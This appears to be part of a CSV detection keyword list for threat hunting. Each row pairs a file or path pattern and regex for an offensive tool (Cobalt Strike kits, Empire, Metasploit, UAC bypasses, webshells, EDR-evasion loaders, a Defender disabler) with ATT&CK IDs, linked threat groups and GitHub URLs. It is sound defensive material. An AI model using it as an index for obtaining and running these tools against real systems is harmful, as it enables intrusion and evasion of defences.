"*/elevate_wmic.py*",".{0,1000}\/elevate_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6912"
"*/elevateit.bat*",".{0,1000}\/elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","6913"
"*/ElevateKit/elevate.*",".{0,1000}\/ElevateKit\/elevate\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","6914"
"*/Elevator.git*",".{0,1000}\/Elevator\.git.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","6915"
"*/elf/dll*",".{0,1000}\/elf\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6916"
"*/elf/exe*",".{0,1000}\/elf\/exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6917"
"*/ELFLoader/*",".{0,1000}\/ELFLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","6918"
"*/ELMALISEKER Backd00r.asp*",".{0,1000}\/ELMALISEKER\sBackd00r\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6919"
"*/ElusiveMice.git*",".{0,1000}\/ElusiveMice\.git.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","6920"
"*/email_spoof_checks.txt*",".{0,1000}\/email_spoof_checks\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","#linux","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","6921"
"*/EmailAll.git*",".{0,1000}\/EmailAll\.git.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","6922"
"*/emailall.py*",".{0,1000}\/emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","6923"
"*/embedded/framework/msfdb-kali*",".{0,1000}\/embedded\/framework\/msfdb\-kali.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","6924"
"*/EmbedInHTML.git*",".{0,1000}\/EmbedInHTML\.git.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","6925"
"*/EmbedInHTML/*",".{0,1000}\/EmbedInHTML\/.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","6926"
"*/emotet.profile*",".{0,1000}\/emotet\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","6927"
"*/Empire.git",".{0,1000}\/Empire\.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6928"
"*/empire/client/*",".{0,1000}\/empire\/client\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6929"
"*/empire:latest*",".{0,1000}\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6930"
"*/empire_exec.py*",".{0,1000}\/empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6931"
"*/empire-chain.pem*",".{0,1000}\/empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6932"
"*/EmpireProject*",".{0,1000}\/EmpireProject.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","6933"
"*/enable_all_tokens.exe*",".{0,1000}\/enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6934"
"*/EnableAllMacros_AMSI.py*",".{0,1000}\/EnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6935"
"*/EnableAllMacros_AMSI.vba*",".{0,1000}\/EnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6936"
"*/EnableAllTokenPrivs.exe*",".{0,1000}\/EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6937"
"*/EnableAllTokenPrivs.git*",".{0,1000}\/EnableAllTokenPrivs\.git.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6938"
"*/EnableAllTokenPrivs.ps1*",".{0,1000}\/EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6939"
"*/enable-defender.exe*",".{0,1000}\/enable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6940"
"*/enable-user.py*",".{0,1000}\/enable\-user\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6941"
"*/enableuser/enableuser.x64.*",".{0,1000}\/enableuser\/enableuser\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6942"
"*/enableuser/enableuser.x86.*",".{0,1000}\/enableuser\/enableuser\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6943"
"*/enc_shellcode.bin*",".{0,1000}\/enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","6944"
"*/enc_shellcode.h*",".{0,1000}\/enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","6945"
